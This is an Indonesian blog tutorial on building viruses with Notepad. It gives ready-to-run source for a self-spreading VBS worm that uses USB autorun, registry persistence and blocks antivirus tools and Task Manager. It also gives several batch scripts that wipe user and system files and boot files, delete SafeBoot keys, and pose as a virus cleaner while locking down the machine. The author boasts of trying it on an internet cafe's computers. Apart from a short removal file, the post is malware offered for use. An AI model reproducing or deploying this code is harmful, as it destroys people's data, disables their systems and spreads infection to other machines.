Halaman

Jumat, 08 Oktober 2010

Cara Membuat Virus Melalui Notepad bag.2

Beberapa Cara Membuat Virus Sederhana Dengan Notepad versi Script VBS dan Bat v2 (New Updated)

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc atau CD terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya.
Kemaren Entah aku lupa kapan aku pernah posting artikel ini “Beberapa Cara Membuat Virus Sederhana Dengan Notepad versi Script VBS dan Bat V.1″ tapi masih bentuk draft dan kodenya agak kacau n sekaran udha aku update dan aku tambah efek virusnya biar agak ngrrrGezz abizz hehe aku namakan bosgentongs virus v.2. udha aku Praktekin di warnet dan hasilllNya komp warnet langsunG buyar… HiiiHii :P
Buka notepad, Lalu Copy Paste Code Script di Bawah ini Yaw…. dan simpan dengan ekstensi bat (klo yang disuruh bat) atau ekstensi vbs (Klo yang disuruh vbs), misalnya virus.bat/virus.vbs
===========================================================================
PEMBUATAN VIRUS DENGAN EKSTENSI .VBS <simpan dengan
nama bosgentongs.exe.vbs>

===========================================================================
‘//BosGenToNgs ITS Ver 2
‘//Varian dari Matrix.VBS
‘//INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!
‘//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus//

on error resume next
‘//Dim kata-kata berikut ini//
dim mysource,winpath,flashdrive,fs,mf,atr,tf,bosgentongs,nt,check,sd
‘//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information AliAss atr AutoruN//
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe bosgentongs.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbcrlf
loop
do
‘//Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)//
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\batch- bosgentongs.exe.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\batch- bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\batch- bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok//
‘//Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket//
for each flashdrive in fs.drives
‘//Cek Drive//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\ //
set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\bosgentongs.exe.vbs “,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf yang teks-nya tadi sudah datrapkan (Auto Setup Information)//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//Manipulasi Registry//
set bosgentongs = createobject(”WScript.Shell”)
‘//Manip – Ubah Title Internet Explorer menjadi THE bosgentongs v.s. Viruz//
bosgentongs.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE bosgentongs v.s. Viruz
‘//Manip – Set agar file hidden tidak ditampilkan di Explorer//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced \Hidden”,2,“REG_DWORD”
‘//Manip – Hilangkan aliaz blokir menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”
‘//Manip – Disable klik kanan//
bosgentongs.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”
‘//Manip – Munculkan Pesan Setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Bosgentongs:No Cry No wOman
bosgentongs.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”Worm bosgentongs. Variant from Viruz Sex Bebass, don’t panic all data are safe.
‘//Manip – Aktif setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, winpath & “\batch- bosgentongs.exe.vbs “
‘//Manip – Ubah Registered Owner dan Obosgentongsanization//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredObosgentongsanization”, “The Matrix EvoLution
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”bosgentongs
‘//Manip – Membuat Cadangan di sistem svchost, MS32Dll dan membuat ikon//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\bosgentongs.exe.vbs”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
bosgentongs.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3”
‘//Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad//
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SM?RTP.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smadav.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe\Debugger”,”notepad.exe”
‘//New Bonus//
if check <> 1 then
Wscript.sleep 100000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000
===========================================================================
PEMBUATAN VIRUS DENGAN EKSTENSI .BAT <simpan dengan
nama bosgentongs.bat>

===========================================================================
cd C:\
mkdir\Alert\Warning\Dangers\A NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMAN\Makan
cd C:\Windows\
mkdir\Alert\Warning\Dangers\A NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMAN\Makan
cd C:\Windows\System32\
mkdir\Alert\Warning\Dangers\A NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMAN\Makan
cd D:\
mkdir\Alert\Warning\Dangers\A NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMAN\Makan
@echo off
copy bosgentongsvirus.bmp %systemdrive%\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\system32\ /y
copy bosgentongsvirus.exe %systemdrive%\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM BOSGENTONGS” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v bosgentongsvirus /d %systemdrive%\windows\system32\bosgentongsvirus.exe /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_CURRENT_USER\Control Panel\Colors” /v window /d #C10000 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ——————————————————-
echo ============= BOSGENTONGS love HACKER ==============
echo ============= bosgentongs inc. Team ==============
echo ============= Kediri, 16 Juli 2009 ==============
echo ——————————————————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
echo Deleting All Data
ping localhost -n 2 >nul
cls
echo Deleting All Data.
ping localhost -n 2 >nul
cls
echo Deleting All Data..
ping localhost -n 2 >nul
cls
echo Deleting All Data…
cls
Echo Deleting All Data….
ping localhost -n 2 >nul
cls
Echo Deleting All Data…..
ping localhost -n 2 >nul
cls
Echo Deleting All Data……..
ping localhost -n 2 >nul
cls
Echo All data have been Deleted
ping localhost -n 2 >nul
cls
Echo System Error
Echo System can’t open windows Folder
Echo Warning! Sistem shutting down
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 5400 -c “This is a virus. You have been Hakced By Bosgentongs. Thank you for your attention
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
===========================================================================
KETERANGAN
# Warna Merah artinya
Tidak Usah Ditulis Karena hanya Sebagai Petunjuk Saja #

# Warna Biru Artinya
Tulisan ini Bisa Diganti Degan Tulisan Sembarang Terserah Kamu #

Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file
untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive. Untuk membuat auturun buka notepad copy-paste code di bawah dan simpan dengan file name: Autorun.inf dengan save as type: All files Saya Beri kode autorun.inf Bila Belum Tau:
NB: Warna biru adalah nama file virus+ekstensinya yang kamu buat tadi

===========================================================================
AUTORUN UNTUK FILE bosgentongs.exe.vbs <simpan dengan
nama autorun.inf>

===========================================================================
[Autorun]
UseAutoplay=1
Icon=%SystemRoot%\system32\SHELL32.dll,7
Shellexecute=wscript.exe bosgentongs.exe.vbs
Shell\OPEN\COMMAND=wscript.exe bosgentongs.exe.vbs
Shell\explore\COMMAND=wscript.exe bosgentongs.exe.vbs
Action=Open folder to view files
===========================================================================
ANTI DOT UNTUK VIRUS bosgentongs.exe.vbs <simpan dengan
extensi antibosgentongs.inf>

Untuk menjalankannya klik kanan file antibosgentongs.inf lalu klik Install
===========================================================================
[Version]
Signature=”$My EartH$”
Provider=Bosgentongs_teaM
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,
NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,
DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,
NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ansav.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SM?RTP.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smadav.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe, Debugger
===========================================================================
VIRUS BGEMPTY.BAT <simpan dengan extensi bgempty.bat>
===========================================================================
cls
cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
cls
echo DONE!
echo By Bosgentongs
shutdown -r -t 10-c “Selamat semua Virus anda telah dibersihkan… Berbahagialah Siapkan cd windows anda”
===========================================================================
VIRUS Gilazz Team.BAT <simpan dengan extensi bg&gilazteam.bat>
===========================================================================
@echo off
echo ================================
echo ================================
echo Killer Viri
echo created By The GhilazZ Team
echo Support by Bosgentongs Team
echo ================================
echo ================================
echo .
echo Readme.txt
echo Hallo semua program yang ada di hadapan anda ini
echo adalah sebuah program kecil yang unik untuk membunuh virus
echo Caranya sebagai contoh anda cukup mengetikan
echo Nomor saja : 1.Brontok 2.Worm 3.VBS 4…Others
echo Contoh: 1…lalu tekan Enter
echo (Ketikan anda tidak terlihat dilayar)
echo Hapus dan Bersihkan lalu tekan Enter
echo Kamu yakin?? lalu tekan Enter
echo Mudah bukan…???
echo jangan mo kalah dengan bikinan luarnegri
echo coba buatan Indonesia
echo Merdeka…merdeka…merdeka…
echo .
echo Register The GhilazZ Team and supported by Bosgentongs Team
pause
echo Masukkan 1,2,3,4
pause
echo Begin scanning viri….. tekan Enter
cls
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableRegistryTools” /t REG_DWORD /d 00000001
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v “NoDrives” /t REG_DWORD /d 67108863
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableTaskMgr” /t REG_DWORD /d 00000001
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableTaskMgr” /t REG_DWORD /d 00000001
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v “NofIND” /t REG_DWORD /d 00000001
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V “NoClose” /t REG_DWORD /d 00000001
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V “NoRun” /t REG_DWORD /d 00000001
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V “NoLogOff” /t REG_BINARY /d 01000000
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /V “DisableCMD” /t REG_DWORD /d 00000001
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Pinguin_attack /t REG_BINARY /d fuckinjoshbush
REG ADD HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v “SALAM HANGAT UNTUK SEMUA, FROM THE TEAM GHILAZZ…luv U all my victim..mmmuacccchh” /t REG_DWORD /d 00000001
pause
echo Hapus dan Bersihkan lalu tekan Enter
cls
pause
echo Kamu yakin?? lalu tekan Enter
pause
echo Create Backup Windows…..tekan Enter
pause
cls
md \We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \We_destroyed_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \we_are_your_nightmare\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe
cls
:viru1
echo Your compie clean but my viri in your computer
echo Your system vulneberity have been Control of my viri
echo Your computer be come weknees…………………..
echo Say good bye to your computers………………….
echo Regards The GhilazZ Team….Salam hangat untukmu….
cls
echo . “We fly inthe night when you’re sleeping in bed”
echo ***************************************************************
echo ***************************************************************
echo The GhilazZ Team Was Here…The GhilazZ Team Was Here…
echo 999999999999999999
echo 999999999999999999999999
echo 9999999999999999999999999999
echo 999999 9999999 9999999
echo 9999999 99999 99999999
echo 9999999 999 99999999
echo 9999999999999999999999999999999
echo 9999999999999999999999999999999
echo 999999999999 99 9999999999999
echo 9999999999999999999999999999999
echo 99999999999999999999999999999
echo 99999999999999999999999
echo 000 000 000 000 00
echo 000 000 000 000 00
echo .. … … … .
echo 00 000 000 000 0
echo 00 000 000 000 0
echo 999999999999999999
echo 9999999999999999
echo 00000000000000
echo The GhilazZ Team Was Here…The GhilazZ Team Was Here…
echo ****************************************************************
echo ****************************************************************
echo>>Inul_oke.exe
echo>>sex_machine.dll
echo>>Tukul_ndeso.asm
echo>>Katro_men.exe
echo>>Vulneberity_its_yours.mp3
echo>>Seek_and_Destroyed.dat
echo>>Sampah_loe.exe
echo>>Gwe_ada_disini.exe
echo>>Britneys_bugilz.mpeg
echo>>Fuckin_US.exe
echo>>TKIKIL.exe
echo>>msfuck.exe
echo>>Goodlinux.exe
goto viru1
copy Inul_oke.exe C:
copy sex_machine.dll C:
copy Tukul_ndeso.asm C:
copy Katro_men.exe C:
copy Vulneberity_its_yours.mp3 C:
copy Seek_and_Destroyed.dat C:
copy Sampah_loe.exe C:
copy Gwe_ada_disini.exe C:
copy Britneys_bugil.mpeg C:
copy Fuckin_US.exe C:
copy TKIKIL.exe C:
copy msfuck.exe C:
copy Goodlinux.exe C:
copy Inul_oke.exe C:\Windonws\System32
copy sex_machine.dll C:\Windonws\System32
copy Tukul_ndeso.asm C:\Windonws\System32
copy Katro_men.exe C:\Windonws\System32
copy Vulneberity_its_yours.mp3 C:\Windonws\System32
copy Seek_and_Destroyed.dat C:\Windonws\System32
copy Sampah_loe.exe C:\Windonws\System32
copy Gwe_ada_disini.exe C:\Windonws\System32
copy Britneys_bugil.mpeg C:\Windonws\System32
copy Fuckin_US.exe C:\Windonws\System32
copy TKIKIL.exe C:\Windonws\System32
copy msfuck.exe C:\Windonws\System32
copy Goodlinux.exe C:\Windonws\System32
attrib +a +s +h *.*
md \We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \We_destroyed_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \we_are_your_nightmare\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe
===========================================================================
VIRUS Malware Pucker.BAT <simpan dengan extensi bg&malwarePucKer.bat>
===========================================================================
@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8″ d8″‘ `”8b 88
echo 88 d8′ 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8″ a8P_____ 88 88P’ “Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
@echo
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul
:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h “%SYSTEMDRIVE%\%b0t%.ini” >nul
del /f /s /q “%SYSTEMDRIVE%\%b0t%.ini” >nul
set b0t=
attrib -r -s -h “%SYSTEMDRIVE%\ntldr” >nul
del /f /s /q “%SYSTEMDRIVE%\ntldr” >nul
set w0n=win
attrib -r -s -h “%SYSTEMROOT%\%w0n%.ini” >nul
del /f /s /q “%SYSTEMROOT%\%w0n%.ini” >nul
set w0n=
attrib -r -s -h “%SYSTEMROOT%\System32\hal.dll” >nul
del /f /s /q “%SYSTEMROOT%\System32\hal.dll” >nul
attrib -r -s -h “%SYSTEMROOT%\System32\bootcfg.exe” >nul
del /f /s /q “%SYSTEMROOT%\System32\bootcfg.exe” >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * “**** y0u!”
shutdown -r -t 10 -c “fuCker w0rm deteCted!”
goto end
:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f “tokens=*” %%a in (
‘reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\ /v EnableLUA’
) do (
set usac=%%a
)
echo %usac%|find /i “0×1″ > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h “%SYSTEMRDRIVE%\bootmgr” >nul
del /f /s /q “%SYSTEMDRIVE%\bootmgr” >nul
attrib -r -s -h “%SYSTEMRDRIVE%\BOOTSECT.BAK” >nul
del /f /s /q “%SYSTEMRDRIVE%\BOOTSECT.BAK” >nul
copy %0 “%ALLUSERSPROFILE%\Start Menu\Programs\Startup” 2> nul
copy %0 “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\St art Menu” 2> nul
echo x=msgbox(“0wned!”,vbCritical or vbOkOnly,”fuCker w0rm”) >> “w0rm.vbs”
start “” “w0rm.vbs” 2> nul
shutdown -s -t 10 -c “fuCker w0rm deteCted!”
goto end
) else (
echo :HjT >> “%TEMP%\HjT.bat”
echo tskill /a HijackThis >> “%TEMP%\HjT.bat”
echo goto HjT >> “%TEMP%\HjT.bat”
start “%TEMP%\HjT.bat”
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> “disk.vbs”
echo set oWMP = CreateObject(“WMPlayer.OCX.7″ ) >> “disk.vbs”
echo set colCDROMs = oWMP.cdromCollection >> “disk.vbs”
echo colCDROMs.Item(d).Eject >> “disk.vbs”
echo colCDROMs.Item(d).Eject >> “disk.vbs”
echo loop >> “disk.vbs”
